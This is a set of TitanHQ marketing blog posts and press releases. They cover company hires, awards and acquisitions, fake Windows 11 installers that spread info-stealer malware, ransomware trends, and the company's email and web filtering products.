TitanHQ has been providing innovative solutions to managed service providers for more than 20 years and offers multiple award-winning SaaS solutions for email security, web filtering, email archiving, email encryption, and security awareness training. The products are used by more than 8,500 businesses worldwide and over 2,500 MSPs to protect against malware, ransomware, phishing, viruses, botnets, and other cyber threats, and to help businesses meet compliance requirements.
TitanHQ products have been built from the ground up for MSPs and save them considerable support and engineering time by stopping problems at the source. The solutions are a huge hit with MSPs due to their ease of implementation, ease of use, and seamless integration into the existing technology stacks of MSPs. The TitanHQ MSP-centric platform enables MSP partners to generate recurring revenues through the sales of TitanHQ solutions to SMBs, and easily scale and effectively manage their own businesses.
“I see my role as being more of a liaison than anything,” said Tom, regarding the recent appointment. “TitanHQ already has a fantastic offering. You’ll be hearing me talk about that in the future. For now, I think it’s more important to highlight the commitments TitanHQ has made to the channel. This is a company that is 100% dedicated to making sure they serve the MSP community.” Tom went on to say, “I’ve wanted to work for a rising cybersecurity company for quite a while now. Here I know I can use my skills and understanding of MSP operations, sales, and marketing to help MSPs succeed. Working together with TitanHQ we can give MSPs everything they need to provide quality cyber services to their clients.”
It is vital for any company looking to expand in the US and better serve the needs of MSPs to bring in MSP industry experts. “For over 20 years TitanHQ has worked with MSPs to develop best in class, advanced, and highly innovative cybersecurity solutions. We pride ourselves on the sophisticated yet easy-to-manage offerings we bring to the market. Bringing Tom on board is yet another leap to allow us to offer the best service to the MSP market,” said TitanHQ Marketing Director, Dryden Geary.
Many organizations punish employees who make cybersecurity mistakes and fail phishing simulations but punishing employees for failing phishing simulations is often not effective and can have unintended negative consequences.
Actions taken by companies when employees fail phishing simulations
Studies suggest that around 40% of companies punish employees for failing phishing simulations and for making other security mistakes. The actions taken range in severity from naming and shaming employees, through removing access privileges, losing other privileges and benefits, and locking computers or blocking email until training has been completed, to disciplinary action such as verbal and written warnings, and termination.
There naturally needs to be consequences if employees fail phishing simulations or make security mistakes, as if there are none, there will be no incentive for change. However, there are risks with using the stick rather than the carrot. Punishing employees for non-malicious security failures and failed phishing simulations often does not work.
Do you really want to create a culture of fear?
If you want to create a security culture in your organization you need to motivate your employees to become security titans, and that is unlikely to happen if the motivation comes from the threat of being fired if a mistake is made. Employees can become stressed and anxious if they are scared of severe punishments for security failures, especially if they have already failed a phishing simulation. That is unlikely to be beneficial for the company and could lead to the creation of a hostile work environment and loss of productivity. It could also serve to demonize the security team which is never a good thing.
If employees are scared about making mistakes, they may not report them when they happen
When employees make a mistake, such as clicking a link in a real phishing email or installing malware, and recognize the mistake, it is essential that they report it. Prompt action by the security team can be the difference between neutralizing the threat before any harm is caused and suffering an incredibly costly ransomware attack or data breach. If employees are worried about losing their jobs for making a mistake or suffering other serious consequences, they may avoid reporting the error.
Businesses need to be careful with punishing employees for non-malicious actions or security failures and should ensure that they make it clear to employees that the failure to report a known security mistake is a serious issue that could result in termination and will have far more serious consequences than the actual error.
Security awareness training should not be viewed as a punishment
If employees make security mistakes or fail phishing simulations it can be due to many reasons. The training provided has clearly not been effective with certain employees, and this could be due to the training material or the different needs of employees – it may not be a case of employees not paying attention or sloppy working practices.
When security mistakes are made or phishing simulations are failed, there is clearly a need for further training, but it is important that security awareness training is not seen as a punishment. It should be a positive experience and be explained that it is part of an ongoing educational process.
Consider real-time security awareness training
You should be providing security awareness training during the onboarding process, and annual training sessions are important, but if you want to create a security culture you need to go further. Cybersecurity newsletters, reminders, and additional training can be useful if they are not provided too regularly. Daily emails will be ignored, whereas monthly, bimonthly, or quarterly updates are more likely to be read and assimilated.
One of the best approaches to training is to provide basic training to everyone and then to provide behavior-driven, real-time security awareness training. When an employee makes a mistake, falls for a phishing simulation, or is discovered to have engaged in a risky behavior, an alert can be triggered and immediate training can be provided. This is bite-sized training that is relevant and specific to an action that was taken, that explains how the mistake was made, why it is a problem, and how it could have been avoided. Mistakes serve as educational triggers and can be turned into teachable moments and training provided in this way is likely to be much more effective than making an employee go through the same standard training program again.
The SafeTitan security awareness and phishing simulation platform
SafeTitan is the only behavior-driven security awareness platform that delivers training in real-time, allowing businesses to mitigate the growing problem of social engineering and advanced phishing attacks. The platform includes an extensive library of training courses, videos, and quizzes that businesses can use for general and customized training campaigns, and provides gamified, interactive, and enjoyable security awareness training sessions with short and efficient testing.
Training can be automatically generated in response to specific employee behaviors to ensure errors and risky behaviors are immediately tackled. The platform also includes fully automated simulated phishing attacks, using regularly updated phishing templates to match current attack trends. The training and simulations have been shown to reduce susceptibility to phishing by up to 92%. Users also benefit from enterprise-level reporting in an easily digestible format that demonstrates the ROI.
Contact TitanHQ today for more information and to sign up for a free trial of SafeTitan.
In October 2021, Microsoft launched its latest operating system – Windows 11 – and cybercriminals were quick to take advantage, offering free Windows 11 upgrades as a lure to trick people into installing malware.
Windows 11 has not been a roaring success so far. According to data from the IT asset management solution provider Lansweeper, on April 4, 2022, only 1.44% of corporate and personal devices had Windows 11 installed, which is less than the number that have Windows XP installed, for which support stopped being provided in 2014.
One of the main issues with Windows 11 is the stringent hardware compatibility requirements. One of the requirements for a Windows 11 upgrade is for devices to support Trusted Platform Module (TPM) version 2.0, which means any devices over 4 years old will not be able to have Windows 11 installed unless the hardware is upgraded.
Microsoft offers a tool on its website that will check whether a device has the hardware to support an upgrade to Windows 11, but any user who has not visited the official Microsoft website is likely to be unaware of the hardware restrictions, and it is those individuals who are being targeted and tricked into installing malware.
Malware is often distributed via peer-2-peer file-sharing networks and warez sites that offer pirated software, either packaged with the software installers or with the product activators and cracks that are used to generate valid licenses; however, the fake Windows installers are being pushed through search engine poisoning.
Search engine poisoning, also known as SEO poisoning, is the creation of malicious websites and the use of search engine optimization techniques to get those websites to appear high in the organic search engine listings for certain search terms, in this case terms related to Windows 11 downloads.
When a user enters such a search string into Google, the malicious website appears in the listings. A variety of domains are used in the campaigns that at first glance appear to be legitimate, windows11-ugrade11.com being one example. The landing page on these websites includes the Microsoft logo and menus and an attractive Get Windows 11 screen with a Download Now button.
One campaign has been identified that delivers a novel malware variant dubbed Inno Stealer, which is installed by an executable file in the downloaded ISO file. Inno Stealer can steal web browser cookies, passwords stored in browsers, data from the filesystem, and data in cryptocurrency wallets. Other malware variants are also being distributed using similar tactics. Fake Windows installers have also been distributed via phishing emails. One campaign delivers Qbot malware via a password-protected ZIP file that contains a malicious MSI installer.
Spam filtering solutions can be used to block malware delivery via phishing emails; however, to block malware downloads from web browsing, a web filter is required. WebTitan is a DNS-based web filter that incorporates advanced DNS filtering controls to block access to malicious websites and prevent malware downloads.
WebTitan is fed threat intelligence from a network of 650 million worldwide users. Newly identified threats are immediately propagated to database deployments worldwide to provide coverage and protection against emerging, zero-hour threats. The solution can also be configured to block attempts by users to download file types often associated with malware, such as ISO and MSI files. WebTitan can handle any volume of usage with no latency, so users will be unaware that content is being filtered until they encounter a threat and are informed by WebTitan that the threat has been blocked.
If you want to improve your defenses against malware and phishing attacks via the Internet, contact TitanHQ today to find out more about WebTitan. Product demonstrations can be arranged on request and the full product is available on a free trial (with full support) to allow you to see for yourself how effective it is at blocking threats and how easy it is to install, set up, and use.
Expert Insights has announced its Spring 2022 Best-Of awards and TitanHQ has been given awards in 5 categories, including best-in-class awards for SpamTitan Email Security, WebTitan DNS Filter, ArcTitan Email Archiving, and SafeTitan Security Awareness training.
Expert Insights is an online publication that receives more than 80,000 visitors a month. Business owners and Information Technology professionals rely on the website which provides insights into the best business software solutions, along with blog posts, buyers’ guides, technical product reviews and analyses, interviews with industry experts, and reviews of software solutions by users of those solutions, who give accurate advice on their experiences and how the products perform in practice.
The Best-Of Awards recognize vendors and products that excel in their respective categories and help businesses achieve their goals. “Each of the services recognized in our awards are providing in many cases an essential service to their users, driving business growth, securing users in a challenging cybersecurity marketplace, and massively improving business efficiency,” said Joel Witts, Expert Insights’ Content Director.
Each category includes a maximum of 11 products that have been analyzed by Expert Insights’ editorial and technical teams in the UK and US and have achieved excellent ratings from genuine users of the solutions. “These awards recognize the continued excellence of the providers in these categories,” said Witts.
At the Expert Insights Spring 2022 awards, TitanHQ was ranked the number 1 solution in the Best Email Security Gateway category for SpamTitan Email Security, ArcTitan Email Archiving was ranked number 1 in the Email Archiving for Business category, WebTitan DNS Filter ranked second in the Web Security category, and SafeTitan Security Awareness Training was ranked in the top 10 in two categories, Security Awareness Training and Phishing Simulation.
“The recent pandemic and the growth of remote working initiatives have further highlighted the need for multiple layers of cybersecurity and our award-winning solutions form key pillars in this security strategy,” said TitanHQ CEO Ronan Kavanagh. “We will continue to innovate and provide solutions that MSPs can use to deliver a consistent, secure and reliable experience to their customers.”
Businesses need to invest in an advanced email security solution to block email-based cyberattacks and nuisance emails. SpamTitan, for instance, will block 99.99% of spam emails and 100% of known malware. SpamTitan includes advanced threat protection mechanisms and machine learning technology that can predict new attacks, along with sandboxing to identify zero-day malware threats.
The problem for businesses is that even with cutting-edge email security, some threats will bypass email defenses and will land in inboxes where they can be opened by employees. All it takes is for a single email to be opened by a single employee to give an attacker the foothold in the network that is needed to launch a devastating ransomware attack.
Technical defenses against phishing such as spam filters and web filters are important for cybersecurity, and alongside robust backup procedures, prompt patching, good password policies, and a next-generation firewall, your business will be well defended, but it is important not to neglect your human defenses, especially considering that 85% of cyberattacks involve human error.
Security awareness training for the workforce has always been important, but with cyberattacks on businesses now occurring at record rates, it is now a critical security measure. Security awareness training aims to teach the workforce the skills they need to recognize and avoid security threats. Training should cover cybersecurity best practices such as setting strong passwords, never writing passwords down, and never accessing the network over a public Wi-Fi network without using a VPN.
The importance of training on how to identify phishing emails cannot be overstated. 9 out of 10 successful cyberattacks start with a phishing email. Phishing is concerned with tricking employees into disclosing their credentials or opening a malicious file that triggers a malware download. Attacks may also impersonate trusted individuals to trick employees into emailing sensitive data. Some phishing emails are easy to identify due to spelling mistakes, grammatical errors, and too-good-to-be-true offers, but many attacks are not so obvious. Employees need to be taught how to identify these emails, what to look for, and to be cautious when opening any email.
Spear phishing emails can be very convincing. They can be personalized, highly targeted, include the correct branding and logos, have spoofed sender names, and make perfectly plausible requests. Social engineering techniques are used to get the recipient to take the requested action and to do so without thinking, such as enabling content when opening an email attachment. Untrained employees cannot be expected to know about these cyberattacks and scams, and that enabling content in a document or spreadsheet will allow macros to run, which will silently download malware.
Security awareness training is important for everyone in the organization, from the CEO down. In fact, the CEO and other executives are the real prizes in phishing attacks as they have credentials that provide more extensive access to networks and sensitive data, so they need to also receive security awareness training. Providing regular security awareness training to the workforce is important, but so is testing the effectiveness of the training. Phishing simulations should be conducted to see if the workforce has taken the training on board. Simulation exercises provide immediate feedback on how the workforce will respond when a real threat is encountered. If the simulation is failed, employees will need to be given further training.
TitanHQ has developed SafeTitan to help businesses with their security awareness training. The platform provides real-time security awareness training to develop a human firewall to complement your technical cybersecurity defenses. The SafeTitan platform also allows businesses to run phishing simulations to see how effective the training has been and how employees will respond to social engineering and advanced phishing attacks when they are encountered.
For further information, get in touch with TitanHQ and take the most important step toward creating your human firewall.
Employees who wish to avoid personal legal trouble may choose to access questionable or illegal Internet content at work instead. Employers can protect against liability for such actions by their employees by implementing a solution to block this activity, and it is becoming increasingly important to do so as intellectual property owners are taking action against these activities.
Film Studios Crackdown on Illegal Downloads
When networks are used for illegal activities, action can be taken against the owners of those networks and the film and music industries have been particularly active in recent years as they attempt to stamp out piracy and copyright infringement. Several lawsuits have been filed against VPN providers over the use of their services for downloading pirated content. This month TorGuard settled a lawsuit filed by more than two dozen film studios over the use of its network for downloading pirated content and similar lawsuits have been filed against LiquidVPN and VPN.ht.
Lawsuits against individuals who download illegal content often do not make it to the courts due to the difficulty of proving that a particular individual downloaded copyright-infringing content from a given IP address, but action is increasingly being taken over pirated movie downloads. Illegal downloads of the film Ava saw action taken by the movie studio Voltage Holdings LLC, which obtained a court order requiring the broadband provider Virgin Media to release the details of customers who had downloaded the film.
In Canada, at least 17 lawsuits have recently been filed over copyright-infringing movie downloads, with more than 1,000 individuals named in the lawsuits. Some of those individuals have been ordered to pay $5,000 in damages for downloading films such as A Family Man and London Has Fallen. When multiple downloads of such material are occurring at a business, legal action could be taken against that business for failing to prevent the illegal activity.
Software Companies Take Action Over Unlicensed Software Use
It is not only pirated software downloads that can attract legal action. Siemens has taken action over copyright infringement related to the use of its software such as NX, Solid Edge, Femap, Star CCM, and FloTHERM. 142 users were identified as using unlicensed software and are the subject of the lawsuit. Software illegally downloaded and used by businesses can see damages imposed at many times the value of the software. While most businesses would not download unlicensed software, that may not be the case with all of their employees. Employees often choose to download software from file-sharing websites to help them be more efficient at work. Termed shadow IT, this practice not only exposes employers to legal risk, but there is also a very real cybersecurity risk.
Prevent Copyright-Infringing Downloads and Improve Cybersecurity with a Web Filter
Pirated software, and the associated product activators and cracks, are often bundled with malware, which is silently installed along with the pirated software. The malware can provide threat actors with remote access to corporate devices, and those devices can then be used for more extensive cyberattacks on the business. IT departments often discover unauthorized software has been installed on users’ devices when performing upgrades, software installations, repairs, and audits.
Businesses can protect against these illegal activities by employees by using a web filtering solution to block access to websites where pirated material is downloaded. There are also many other benefits of filtering the Internet and preventing access to certain types of web content.
Businesses can prevent the development of a hostile working environment by blocking access to content such as pornography, and they can ensure sufficient bandwidth is always available by restricting access to certain sites during busy times or working hours – YouTube for example.
The biggest benefit of implementing a web filter is blocking malicious websites, such as those known to be used for phishing and malware delivery. WebTitan Cloud, for instance, is fed threat intelligence from more than 650 million users worldwide. When a threat is identified, the solution is automatically updated to protect all users from accessing the malicious content.
Since WebTitan Cloud is a DNS-based web filter, there is no impact on Internet speed. Checks are performed at the DNS lookup stage of a web request, with content checked against databases and filtered in 5 microseconds. The solution can be configured to protect all users, including remote workers. The protection is applied no matter where the Internet is accessed.
If you want to protect your business from the legal risk associated with Illegal web activity, improve your defenses against phishing and malware, and make productivity gains by blocking access to non-essential Internet content, WebTitan Cloud is the ideal solution.
Since WebTitan Cloud is a multi-tenant solution, it is also ideal for MSPs looking to add web filtering to their service stacks. MSPs are offered generous margins, the product can be provided in white-label form ready to take their own branding, and a choice of hosting options is available, including hosting within an MSP’s data center.
For more information on DNS-based web filtering with WebTitan Cloud, contact TitanHQ.
It has been a busy 3 months for TitanHQ with two new product launches, a new Channel Chief, and 12 strategic new hires to support the company’s incredible North American growth.
In February 2022, TitanHQ announced Channel veteran, Jeff Benedetti, had been recruited to lead North American sales and the company’s go-to-market efforts in the U.S. and Canada and continue to expand the company’s North American footprint.
Benedetti has almost two decades of successful sales and go-to-market leadership experience in the security and technology markets, with his most recent position being the sales and marketing chief at SKOUT Cybersecurity – which was recently acquired by Barracuda Networks. Benedetti also served as Director of U.S. Sales at Datto, where he significantly increased partner growth and played a key role in Datto’s expansion. While he was at the company, Datto achieved unicorn status and was acquired by Vista Private Equity. In addition to leading the U.S. channel team, Benedetti will oversee the relaunch of the North American TitanHQ partner program in April 2022.
January and February 2022 have seen TitanHQ enjoy incredible growth globally and especially in North America. To support that growth, Benedetti now has a new North American TitanHQ team that includes 12 strategic new hires to service the US and Canadian Managed Service Provider (MSP) market, which will be based at TitanHQ’s new North American base in Shelton, CT.
Like Benedetti, the new hires have extensive channel experience, with that experience gained at companies such as Datto, Skout Cybersecurity, Agile Blue, and Barracuda.
The new hires include:
Director of Channel Development
Eric Morano has 15 years of sales leadership and GTM experience at Datto, Skout Cybersecurity (BarracudaMSP), AgileBlue XDR, CDW, and Verizon. Morano has been tasked with optimizing TitanHQ’s partner engagement and growth.
Channel Account Managers
Craig Somma has 25 years of technology sales GTM leadership at Tech Dept, Micro Warehouse, and Gov Connection.
Joseph Rende has 10+ years of channel sales experience at Gartner and Datto.
Pat DeAngelis has 10+ years of MSP technology experience at Datto, Threatlocker, and Armor Cybersecurity.
Jeff Brown has 10+ years of sales experience at Datto, SKOUT Cybersecurity, and Agile Blue.
Alex De Los Santos has 8 years of sales experience at Datto and ADP.
Alex Nankervis has 8 years of sales experience at Datto and Indeed.
Kyle Leyerzapf has 5 years of sales experience at Datto.
Patrick Barry has 6 years of sales and accounts experience at Accu-Tech Corporation and Maxim Healthcare.
Jamal Ibrahim has 4 years of account management experience at Altium and RCG.
Marc Bonnaci has 7 years of sales and professional experience, including at Agile Blue.
The New TitanHQ North American Channel Team
In addition to bringing in top talent, TitanHQ has expanded its product portfolio in recent months with the addition of a new anti-phishing solution and security awareness training platform.
In December 2021, TitanHQ launched SpamTitan Plus – A leading-edge AI-driven anti-phishing solution. SpamTitan Plus provides comprehensive “zero-day” threat protection thanks to extensive threat intelligence feeds – More than any of the current market-leading anti-phishing solutions. That translates into a 1.5x increase in unique phishing URL detections and much faster phishing detection speeds – 5 minutes from detection to protecting all users. This new addition to the SpamTitan family has been very well received by IT departments and MSPs.
In February 2022, TitanHQ announced the acquisition of Cyber Risk Aware. The company was formed in 2016 and has grown into a global leader in security awareness training, which targets the human element of cybersecurity. The company’s platform is used to train employees on how to recognize and avoid cyber threats. The platform is an intuitive, real-time security awareness training platform that improves protection against ransomware, malware, BEC, and phishing attacks. The Cyber Risk Aware platform has now been rebranded as SafeTitan and has attracted seismic interest globally from MSPs and IT managers since its launch.
The new product releases, record company growth, highly skilled new channel team, and soon to be relaunched partner program further cement TitanHQ’s position as the leading provider of cloud-based cybersecurity solutions to managed service providers serving the SMB market.
Information about the 2021 ransomware trends identified by U.S. and European cybersecurity agencies and simple steps you can take to improve your security posture and prevent ransomware attacks.
2021 Ransomware Trends
Cybersecurity agencies identified several 2021 ransomware trends that look set to continue throughout 2022. There was an increase in ransomware attacks in 2021 with education and government the most commonly targeted sectors. The pandemic and lockdowns meant businesses needed to switch to remote working and security teams struggled to defend their networks. Ransomware gangs were quick to exploit vulnerabilities to gain access to networks, steal sensitive data, and encrypt files to extort money from businesses.
2021 also saw an increase in sophisticated ransomware attacks on critical infrastructure. Cybersecurity authorities in the United States said cyber threat actors had conducted attacks on 14 of the 16 critical infrastructure sectors, with the UK’s National Cyber Security Centre reporting an increase in attacks on businesses, charities, legal firms, healthcare, and local government.
While initially, several ransomware threat actors were focused on big game hunting – attacking large, high-value organizations that provide critical services such as Colonial Pipeline, Kaseya, and JBS Foods – the attacks prompted the raising of the status of ransomware attacks to the level of terrorism, and the increased scrutiny on ransomware gangs saw ransomware attack trends change, with the focus shifting to mid-sized organizations.
Double extortion tactics have been the norm for the past two years, where attackers exfiltrate data prior to file encryption and then demand payment for the decryption keys and to prevent the publication of stolen data. A new trend of triple extortion in 2021 saw ransomware gangs also threaten to inform the victim’s partners, shareholders and suppliers about the attack. It is also now common for ransomware gangs to work with their rivals and share sensitive data. There have been multiple cases where ransomware gangs have shared information with other gangs to allow them to conduct follow-on attacks.
2021 saw an increase in attacks on the supply chain. By compromising the supply chain, ransomware gangs are able to conduct attacks on multiple targets. There was also an increase in attacks targeting managed service providers, where MSP access to customer networks is exploited to deploy ransomware on multiple targets. Russian ransomware gangs have been increasingly targeting cloud infrastructure, accounts, application programming interfaces, and data backup systems, which has allowed them to steal large quantities of cloud-stored data and prevent access to essential cloud resources.
Diverse tactics were used in 2021 to gain access to victim networks, including quickly developing exploits for known vulnerabilities, conducting brute force attacks on Remote Desktop Protocol, and using stolen credentials. These tactics have proven effective, helped by the increase in remote working and remote schooling due to the pandemic.
Improve Your Defenses Against Ransomware Attacks
To defend against ransomware attacks, it is important to prevent attackers from using these tactics. The number of reported vulnerabilities increased in 2021 and security teams struggled to keep up with routine patching. Security teams need to prioritize patching and concentrate on the vulnerabilities that are known to have been exploited, such as those published in the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities Catalog, and critical vulnerabilities where there is a high chance of exploitation.
To combat brute force attacks, it is important to ensure all default passwords are changed and strong passwords are set for all accounts. Consider using a password management solution to make this easier. Multifactor authentication should be set up for as many services as possible, especially for access to critical systems, VPNs, and privileged accounts. RDP, other remote access solutions, and risky services should be closely monitored and ports and protocols that are not being used should be disabled.
It is also vital to take steps to prevent phishing attacks. Phishing is commonly used to obtain credentials that give attackers a foothold in networks, and phishing emails are also used to deliver malware. An advanced email security solution should be implemented to detect and block as many phishing threats as possible and prevent them from being delivered to employee inboxes. A web filtering solution can improve defenses by blocking access to the websites linked in phishing emails and preventing the downloading of malware from the Internet. Security awareness training for the workforce is also important. Training should raise awareness of the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments.
TitanHQ can help with all of these anti-phishing defenses through SpamTitan Email Security, the WebTitan DNS-based Web Filter, and SafeTitan Security Awareness Training. To find out more about these solutions for SMBs, enterprises, Internet Service Providers, and Managed Service Providers, give the TitanHQ team a call.
TitanHQ, the leading cybersecurity SaaS business, today announced its acquisition of Cyber Risk Aware. Established in 2016, Cyber Risk Aware is a global leader in security awareness and mitigation of human cyber risk, assisting companies to help their staff protect the company network.
Cyber Risk Aware delivers real-time cyber security awareness training to staff in response to actual staff network behavior. This intuitive and real-time security awareness training reduces the likelihood users will be impacted by the latest threats such as ransomware, BEC attacks, and data breaches, whilst also enabling organizations to meet compliance obligations. Leading global businesses that trust Cyber Risk Aware include Standard Charter, Glen Dimplex, and Invesco.
TitanHQ has been providing email and web security solutions to businesses, enterprises, and managed service providers for more than two decades and now provides a range of security solutions to more than 8,500 businesses globally, including more than 2,500 managed service providers.
The acquisition will further bolster TitanHQ’s already extensive security offering. It combines intelligent security awareness training with phishing simulation and TitanHQ’s advanced email protection, DNS security, email archiving, and email encryption solutions to create a powerful, multi-layered cybersecurity platform that secures end users from compromise. This is the go-to cybersecurity platform for IT Managed Service Providers and internal IT teams.
“This is a fantastic addition to the TitanHQ team and solution portfolio. It allows us to add a human protection layer to our MSP Security platform, with a fantastic feature-rich solution as demonstrated by the high caliber customers using it. Stephen and his team have built a great company over the years, and we are delighted to have them join the exciting TitanHQ journey,” said TitanHQ CEO Ronan Kavanagh.
The solution is available to both new and existing customers and MSP partners at TitanHQ.com and is now branded as SafeTitan, Security Awareness Training. Existing Cyber Risk Aware clients are unaffected and will benefit from improvements in the platform in terms of phishing simulation content and an exciting, innovative product roadmap.
Stephen Burke, CEO of Cyber Risk Aware, commented: “I am incredibly proud that Cyber Risk Aware has been acquired by TitanHQ, a cybersecurity business that I have greatly admired for a long time. Today’s announcement is fantastic news for both our clients and partners. We will jointly bring together a platform of innovative security solutions that address the #1 threat vector used by bad actors that cause 99% of security breaches, “End User Compromise”. When I first started Cyber Risk Aware, my aim was to be the global security awareness leader in delivering the right message, to the right user at the right time. Now as part of TitanHQ, I am more excited than ever about the unique value proposition we bring to market.”
A campaign has been identified that uses the offer of a free Windows 11 upgrade as a lure to trick people into installing Redline Stealer malware. The Redline Stealer is offered for sale on hacking forums for between $150 and $200 under the malware-as-a-service model. The malware is a popular choice with cybercriminals due to the relatively low cost, ease of use, and the range of sensitive data that the malware can steal.
Redline malware can steal autocomplete data, cryptocurrency, credit card information, FTP and instant messenger credentials, and credentials stored in Chromium-based web browsers. While passwords stored in browsers are encrypted, Redline malware can programmatically decrypt them provided the malware runs as the user who was infected. If the user does not store passwords in the browser, the malware can still steal valuable information from browsers, including the sites the user visited but chose not to store a password for. Phishing emails can then be crafted targeting those credentials, or credential-stuffing attacks could be performed on the accounts for those sites. There have been many cases of Redline malware being installed on endpoints that have antivirus software installed, where the antivirus software has failed to detect and block the malware.
Redline malware is commonly distributed via phishing emails containing an embedded hyperlink to a malicious website, with social engineering tricks used to convince the user to download and run the installer. This approach is often used to target businesses.
Recently, researchers at HP uncovered a campaign that uses a spoofed Microsoft domain offering visitors a free Windows 11 upgrade. The upgrade is offered on the domain windows-upgrade.com, which is a professional-looking domain designed to look like an official Microsoft website. If users click the ‘Download Now’ button, it will trigger the download of a compressed file called Windows11InstallationAssistant.zip, which is downloaded from a Discord CDN.
The zip file contains an executable file called Windows11InstallationAssistant.exe, which will trigger the infection process that will ultimately deliver the Redline stealer payload with no further user interaction required. Now that the domain has been identified as malicious it has been taken down, but the campaign is likely to be relaunched on different domains.
Software installers have long been used to deliver malware. Sometimes the installers are fake and only deliver a malicious payload, while others install a genuine application but also bundle in malware, spyware, or adware. In the latter case, users will likely be unaware that anything untoward has happened, as they will have installed the software they intended to download.
Malicious software installers are often found on peer-to-peer file-sharing networks, legitimate websites that have been compromised, and attacker-owned domains. Search engine poisoning is frequently used to get links to the malicious websites appearing high in the organic search engine listings for key search terms, often those used by businesses. Malicious adverts – malvertising – are often used to send traffic to malicious websites via the third-party ad blocks displayed on legitimate websites. Links to malicious websites may also be added to phishing emails.
While an advanced spam filter can protect against phishing emails containing malicious links, it will do nothing to prevent users from visiting websites hosting malware through web browsing. To protect against web-based attacks, businesses should use a web filter.
A web filter can be used to restrict access to certain categories of website, such as those serving no business purpose. Web filters are fed threat intelligence and use blacklists of known malicious web pages and will prevent access to those web pages or websites. It is also possible to configure a web filter to prevent the downloading of certain file types from the Internet, such as those commonly associated with malware.
Web filters are an important cybersecurity control to add to your arsenal to improve your defenses against malware and ransomware, and they are also effective at blocking the web component of phishing attacks by preventing employees from visiting the websites where credentials are harvested.
TitanHQ has developed an easy-to-use and powerful DNS-based web filter for SMBs, enterprises, and managed service providers. WebTitan Cloud is quick and easy to set up and configure and will allow you to enforce acceptable Internet usage policies and filter out malicious websites in minutes. WebTitan Cloud can protect users of wired and wireless networks, and even remote workers by installing a lightweight client on corporate-owned devices.
If you want to improve your defenses and block more threats, contact TitanHQ for further information on filtering the Internet with WebTitan.
Do you offer Wi-Fi access to your customers? Read on if you do and you are not yet providing a filtered Internet service.
Businesses that offer their customers free Wi-Fi access provide more value, and offering free Wi-Fi can help to attract new business. The provision of Wi-Fi does not come at a great cost, and the low cost of providing free Wi-Fi can be easily recovered. Retailers, restaurants, bars, and coffee shops that provide a free Wi-Fi service encourage customers to remain for longer, which can result in more sales. Many people actively seek out businesses that have a free Wi-Fi service. If it was a toss-up between a café with free Wi-Fi and one without, the coffee would have to be considerably better to make up for the lack of Internet access.
Providing Wi-Fi access is however not without risk. If controls are not implemented on the Wi-Fi network to restrict certain online activities, businesses and other public hotspot providers could be exposed to legal risk if their Wi-Fi network is used for illegal activities. Wi-Fi access could also be abused by customers, who could hog bandwidth by downloading large files or using bandwidth-heavy websites, preventing others from accessing the Internet or slowing down page load speeds. Customers could also use the free access for viewing inappropriate web content such as pornography, in full view of other customers. There have been many reports of patrons of libraries doing just that in the United States.
Anyone who uses public Wi-Fi is taking a risk, as public Wi-Fi networks often lack security. There is a risk of a malware infection when connecting, and Internet connections can be monitored, and sensitive information stolen. Cybercriminals often frequent establishments offering free Wi-Fi to prey on the unwary by creating evil twin Wi-Fi networks and eavesdropping on connections.
Businesses offering free Wi-Fi access may not be able to block all types of cyberattack, but they can implement protections to reduce the risk of their customers being harmed. The way to do this is to provide a filtered Internet service.
Businesses that filter the Internet can prevent customers from unwittingly accessing web pages hosting phishing kits and sites known to be used for malware distribution. Internet speed can be kept fast by blocking access to certain types of online activities, especially with a filtering mechanism that allows time-based controls to be implemented. During busy times, access to websites that consume a lot of bandwidth, such as TV and video streaming sites, could be restricted, and relaxed at quieter times. Filtering the Internet creates a family-friendly Internet service, which will help to protect minors from coming to harm. A filtered Internet service can attract more business from families, especially if the business signs up for the Friendly Wi-Fi scheme.
It is recommended to block websites promoting hate speech and discrimination, child abuse, drugs, weapons, and pornography to create a sanitized Internet service. Filtering the Internet to block illegal activities, such as downloads of copyright-infringing content (pirated music, videos, and software), reduces legal risk and is also recommended.
As an added advantage, Internet filtering solutions can provide insights into customer behavior. Businesses can get a real-time view of Internet activity, can generate reports of the sites and content that are being accessed, and that can be incredibly valuable for guiding future marketing efforts. If a business can see the sites visited by their customers, they will know the types of sites they should advertise on to get the maximum benefit.
Filtering the Internet is not expensive, but the benefits are considerable. The easiest way of filtering the Internet is to use a DNS filtering solution. DNS filtering solutions can be easily implemented and will not affect Internet speed. They require no hardware purchases, and many implementations filter in the cloud, so require no software downloads.
WebTitan Cloud for Wi-Fi from TitanHQ has been developed to make offering customers a filtered Internet service as simple as possible. Users do not need to be IT experts, as the solution is intuitive and simple to set up, use, and maintain. It requires a simple configuration change, which the TitanHQ support team will talk you through implementing, and you can log in to the web portal and filter categories of Internet content you wish to restrict.
WebTitan Cloud for Wi-Fi is a powerful, feature-rich Internet filtering solution, but for many businesses, it is a set and forget solution. Set your policy and forget about it. Whatever reports or alerts you need can be configured to be sent to you automatically.
If you provide either free or paid Wi-Fi access, and you are not yet offering a filtered Internet service, contact the TitanHQ team for more information about WebTitan Cloud for Wi-Fi. A product demonstration can be scheduled if you need it, and you can try the full solution free of charge – with full support – before deciding about a purchase. The team will also be happy to answer any questions you may have about Internet filtering.
TitanHQ is excited to be heading to Threatlocker’s Zero Trust World 2022 in Orlando, Florida this February. The event draws cybersecurity professionals from across the United States and beyond who will gain valuable insights from some of the world’s leading cybersecurity experts that they can take away and apply to better protect their networks and data from the ever-increasing number of cyber threats.
The event runs from February 21-23, 2022 at the Rosen Plaza, and attendees will benefit from keynotes explaining the current threat landscape and the importance of Zero Trust in protecting against those threats. There will be discussions about the latest hacking techniques – and how to stop them – and the theme for the final day is getting serious about tackling cyber threats: attendees will learn about the latest cybersecurity solutions that allow them to level up their cybersecurity stack to better protect against the full range of cyber threats.
There will be live hacking demonstrations, attendees will discover the tools that hackers are successfully using to evade security and attack businesses, and there will be hands-on exercises in workshops, training sessions, and certification labs.
While cybersecurity solutions can certainly help, becoming secure takes planning, analysis, and strategy. Tips and techniques will be provided by some of the leading cybersecurity professionals from around the world, who will talk about the lessons learned from cyberattacks, and the solutions and techniques that have been successfully employed at businesses of all sizes to improve security.
